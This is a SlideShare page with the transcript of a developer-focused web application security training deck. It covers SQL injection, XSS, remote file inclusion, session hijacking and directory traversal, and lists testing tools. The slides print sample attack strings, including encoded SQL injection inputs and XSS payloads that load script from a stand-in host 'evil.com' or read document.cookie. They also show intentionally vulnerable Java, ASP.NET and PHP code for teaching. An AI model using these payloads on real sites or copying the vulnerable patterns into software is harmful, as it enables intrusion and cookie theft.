Application and Website Security -- Fundamental Edition
Upcoming SlideShare
Loading in...5
×
 

Application and Website Security -- Fundamental Edition

on

  • 2,008 views

This is the first presentation in the 200 level, specifically targeting developers with a more hardcore training program. This program includes numerous case studies and live demonstrations and is ...

This is the first presentation in the 200 level, specifically targeting developers with a more hardcore training program. This program includes numerous case studies and live demonstrations and is considered technical, but does not require a working knowledge of the languages discussed.

Statistics

Views

Total Views
2,008
Views on SlideShare
2,007
Embed Views
1

Actions

Likes
0
Downloads
16
Comments
0

1 Embed 1

http://www.slideshare.net 1

Accessibility

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • The above code illustrates a SQL injection vulnerability
  • The code here is vulnerable to XSS
  • The code here is vulnerable to remote include in two locations
  • The code here is vulnerable to a remote include
  • The code here is vulnerable to directory traversal

Application and Website Security -- Fundamental Edition Application and Website Security -- Fundamental Edition Presentation Transcript

  • Application and WebsiteSecurity – FundamentalEditionDaniel OwensIT Security Professional
  • Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • Purpose Drum up interestSession Prerequisites None
  • Communication Media and SecurityConcerns Communication media: „Wired‟ networks „Wireless‟ networks Security concerns: The Insider The Outsider The Technology Nature
  • A Note About Security Security helps functionality – if it doesn’t help functionality, it isn’t security. -Daniel Owens
  • Consequences of Poor Security Stolen intellectual property System downtime Lost productivity Damage to NASA‟s reputation Lost public confidence Lost revenue Congressional inquiries
  • Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • SQL | LDAP Injection SQL and LDAP Injection The injection of malicious code intended to bypass filtering and execute a query of the attacker‟s choosing Can be thwarted using strongly typed variables, parameterized statements, escaping, and whitelists Example Strings include: 1‟1 %31%27%20%4F%52%20%27%31%27%3D%27%31 &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61& #39&#49 *(|(mail=*))
  • Java SQL Injection static void main(String[] args){ Connection conn=null; String username=args[0]; String password=args[1]; String query=“SELECT uid, pass FROM users WHERE uid LIKE “+username+”%”; conn=DriverManager.getConnection(“jdbc:odbc:l ogistics”,”admin”,”LetMeIn”); Statement stmnt=conn.createStatement(); ResultSet rs=stmnt.executeQuery(query); … }
  • Demonstration 1 SQL InjectionBypassing Security Checks
  • Case Study 1SQL InjectionOwning Networks
  • Cross-Site Scripting (XSS) XSS The injection of client-side code Comes in three kinds: Persistent Non-Persistent DOM Only occurs when user input influences the output Can be stopped by assuming all input is malicious until proven otherwise through a whitelist Can lead to a complete system compromise – for
  • Cross-Site Scripting (cont.) XSS (cont.) Sample strings: <script src=http://evil.com/attack.js << </script << <link rel=“stylesheet” href=http://evil.com/attack.css> %3Cscript%3Epref%3Dfunction(a%2Cb) {document.write(a%2B%22%20- %3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22) %3B} %3B%3C%2Fscript%3E%3Cscript%20src%3D%22vie w- source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall. js%22%3E%3C%2Fscript%3E <img src=”” onMouseOver=”alert(document.cookie)”; />
  • ASP.NET Cross-Site Scripting <%@ Page Language="C#" ValidateRequest="false" %> <html> <script runat="server"> void btnSubmit_Click(Object sender, EventArgs e) { Response.Write(txtString.Text); } </script> // CONTINUED ON NEXT SLIDE
  • ASP.NET Cross-Site Scripting (cont.) // CONTINUED FROM PREVIOUS SLIDE <body> <form id="form1" runat="server"> <asp:TextBox id="txtString" runat="server" Text="<script>alert(„hi‟);</script>" /> <asp:Button id="btnSubmit" runat="server" OnClick="btnSubmit_Click" Text="Submit" /> </form> </body> </html>
  • Demonstration 2 XSS Having Fun
  • Remote File Include/Execution |Code Injection Remote File Include and Execution An attacker tricks the system into including and/or executing arbitrary files Code Injection Attacker tricks the system into executing arbitrary code by injecting the commands into the code Both Code of the attacker‟s choosing is executed Contrary to popular belief, ANY language can suffer this
  • PHP Remote File Include <?php …. require_once($_GET[„config‟]); require_once($_GET[„base‟].”/index.php”); …. ?>
  • ASP.NET Remote File Include <% …. set url = Request.QueryString; set xml =Server.CreateObject(“Microsoft.XMLHTTP”); xml.open “GET”, url, false xml.send “” Response.write xml.responseText set xml = nothing …. %>
  • Hidden Elements | Cookies Hidden Elements and Cookies Hidden fields and cookies were merely intended to provide data storage without cluttering up the user‟s view They do not provide secure storage They are not immutable storage locations Neither should contain sensitive information Both should be considered malicious until proven otherwise Any data in it should not be directly used for output Whitelisting should be used to prove innocence
  • Hidden Elements | Cookies (cont.) Hidden Elements and Cookies (cont.) &#65533; -575840793 ReferrerUrlQhttps://XXX.XXX.nasa.gov/CMTOOLS/Log in.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspxTextErr orddOnClickreturnconfirm ... „USERNAME (RandomData)); return false;ddhSetTargetText(ctl00_SimpleSearchForm_Use r2_InputFieldTextbox, „USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)); return; fd- ctl00$SimpleSearchForm$User1$UserListGridView<+ &#65533; fd
  • Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • Session Hijacking – Cookie Theft Cookie Theft The theft of a client‟s cookies by an attacker Often possible because of other vulnerabilities – browser flaws (sandboxing), having TRACE enabled, XSS, etc Can be hampered if mechanisms such as NONCEs are used NONCEs should be a set of characteristics unique to the specific session – client IP, server IP, server port, user agent string, and other key information Additional mechanisms include using secure cookies, but this has limited impact
  • Session Hijacking – SessionFixation Session Fixation An attacker uses a „known‟ session ID Often, the attacker opens the session and keeps it open while attempting to convince a victim to login using the known session This is often a phishing or other social engineering attack Can be hampered if session IDs are „rekeyed‟ on login AND sessions expire and are removed quickly Difficult to stop if sessions are guessable
  • Demonstration 3Session Hijacking Session Fixation
  • Directory Traversal Directory Traversal An attacker is able to trick the system into traversing the directory structure In many instances, arbitrary files can be viewed Attackers are often attempting to execute a file or gather information If user input dictates the output, care must be taken to ensure the input is „valid‟ Whitelists become invaluable In extreme cases, an attacker can actually use this to gain administrator access to the server
  • PHP Directory Traversal <?php …. $date=$_GET[„date‟]; if($handle=fopen(“calendar/$date”,”rb”)){ print(fread($handle,filesize(“calendar/$date”))); fclose($handle); } …. ?>
  • Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • Session Hijacking – Spoofing Spoofing Pretending to be someone else, an attacker attempts to gain the victim‟s privileges Comes in three basic forms Blind (write-only) Half pipe (read-only) Full pipe Network configuration and other protection mechanisms can make this difficult to defeat (both for the attacker and for the developer)
  • Demonstration 4Session Hijacking Spoofing
  • Case Study 2Session Hijacking Spoofing
  • Weak Encryption | Using Encoding Weak/Home-Grown Encryption The use of weak and home grown encryption has led to the compromise of many systems It is also what makes session hijacking via spoofing, and man-in-the-middle with bucket brigade and substitution attacks so trivial Encoding The use of algorithms that take output and simply change the format (normally it is the number of bits used per character) This is not secure by any means
  • Case Study 3Weak Encryption | Encoding XOR SHA Base64
  • Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion and Appendices
  • Security Compass XSS-Me A free Firefox plug-in Performs semi-automated XSS attacks against POST fields SQL Inject-Me A free Firefox plug-in Performs semi-automated SQL injection attacks against POST fields Access-Me A free Firefox plug-in…
  • Other Firefox Add-ons Web Developer Add-on Free Let‟s you view source files cleanly and easily Let‟s you quickly enable and disable things (like cookies, JavaScript, and Meta Refresh) Let‟s you view and modify form fields and cookie data Tamper Data Free Let‟s you modify most request data
  • Fuzzers BED.pl Free Perl script Performs basic tests of your SERVER JBroFuzz Free Java application Let‟s you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion Powerfuzzer Free and commercial versions (Python script) Easy and multi-talented… automated
  • Other Tools Sothink SWF Decompiler Decompiles any Adobe Flash or Flux script Cavaj Free Decompiles any Java program Nikto Free Provides scans of the website looking for common, basic vulnerabilities and misconfigurations
  • Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • For More Information Microsoft Security Site (all audiences) http://www.microsoft.com/security MSDN Security Site (developers) http://msdn.microsoft.com/security TechNet Security Site (IT professionals) http://www.microsoft.com/technet/security SANS Top-20 (IT Professionals) http://www.sans.org/top20/
  • For More Information (cont.) Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Programming Errors (developers) http://cwe.mitre.org/top25/index.html GRC IT Security Office http://itsecurity.grc.nasa.gov Most Common Software Errors http://discussweb.com/software-testing/803-most- common-software-errors.html
  • Acknowledgements I stole the background from Microsoft I stole a lot from my experiences and previous writings